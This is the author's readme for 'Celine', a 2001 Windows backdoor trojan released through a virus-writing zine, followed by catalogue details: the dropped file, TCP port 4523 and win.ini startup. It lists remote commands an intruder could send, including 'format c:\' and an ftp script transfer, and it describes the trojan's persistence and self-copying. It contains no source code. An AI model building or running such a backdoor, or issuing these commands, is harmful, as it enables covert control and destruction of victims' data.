Celine
(Backdoor.Win32.Celine)

by Del_Armg0

Released in April 2001


"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

            +-----------+
	+-  CELINE TR0JAN  -+
            +-----------+

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

 FASTLY CODED BY DEL_ARMG0
 ON 31.03.2001  for MTX #3

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

This is just a fast trojan coded in BASIC for testing RapidQ
langage possibilities. It could be optimized a lot.


Listening port is :  4523 tcp

if u type CELEND, it will stop the server until next boot
if u type CELYNE, ...  ;)


TYPICAL USED COMMANDS ARE :

<commands> <path> <more>

(never forget FULL path)

She uses $path var. and command.com to run.

examples:
---------
dir c:\
dir c:\mirc\
type c:\config.sys
netstat -a -n
format c:\
start c:\hide\file.exe
ftp -v -i -n -s:c:\ftp.scr 255.255.255.255
...


She uses WIN.INI/[RUN] for DeepRooting
Can be renamed or binded, she will copy herself as c:\celine.scr

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

DediCateD to CELINE the Sweetest h0ney Girl i could Dr3am !


Her Site


"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
  Source will be available in MATRiX Zine #3

�~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~�

   Del_Armg0  /  MATRiX team / MTX#3

   [email protected] / [email protected]

   http://www.delly.fr.st

�~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~�


Server:
dropped file:
C:\CELINE.SCR

size: 309 KB

port: 4523 TCP

startup:
c:\windows\win.ini
MegaSecurity